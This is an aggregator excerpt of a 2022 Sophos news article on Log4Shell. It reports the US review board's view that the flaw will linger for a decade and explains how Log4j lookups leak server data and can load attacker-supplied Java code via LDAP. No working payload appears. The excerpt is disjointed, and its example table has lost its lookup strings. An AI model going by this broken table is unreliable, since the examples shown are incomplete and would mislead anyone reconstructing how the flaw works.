Security News > 2022 > July > 8 months on, US says Log4Shell will be around for “a decade or longer”

8 months on, US says Log4Shell will be around for “a decade or longer”
2022-07-18 18:57

Unless you had read the manual really carefully, and taken additional precautions yourself by adding a layer of your own security on top of Log4j, your software could come unstuck.

INPUT OUTCOME ----------------- ---------------------- CURRENT=$ /$ -> CURRENT=Java version 17.0.1/Windows 10 10.0 Server account is: $ -> Server account is: root $ -> SECRETDATAINTENDEDTOBEINMEMORYONLY. Clearly, if you're accepting logging text from a trusted source, where it's reasonable to allow the loggee to control the logger by telling it to substitute plain text with chosen internal data, this sort of text rewriting is useful.

Even worse, the LDAP server could return precompiled Java code for generating the data to be logged, and your server would dutifully run that program - an unknown program, supplied by an untrusted server, chosen by an untrusted user.

Loosely speaking, if any server, anywhere in your network, logged untrusted input that had come in from outside, and used Log4j to do so.

Any back-end server that received and logged data from elsewhere on your network, that was written in Java, and that used the Log4j library.

The [CSRB] assesses that Log4j is an "Endemic vulnerability" and that vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer.


News URL

https://nakedsecurity.sophos.com/2022/07/18/8-months-on-us-says-log4shell-will-be-around-for-a-decade-or-longer/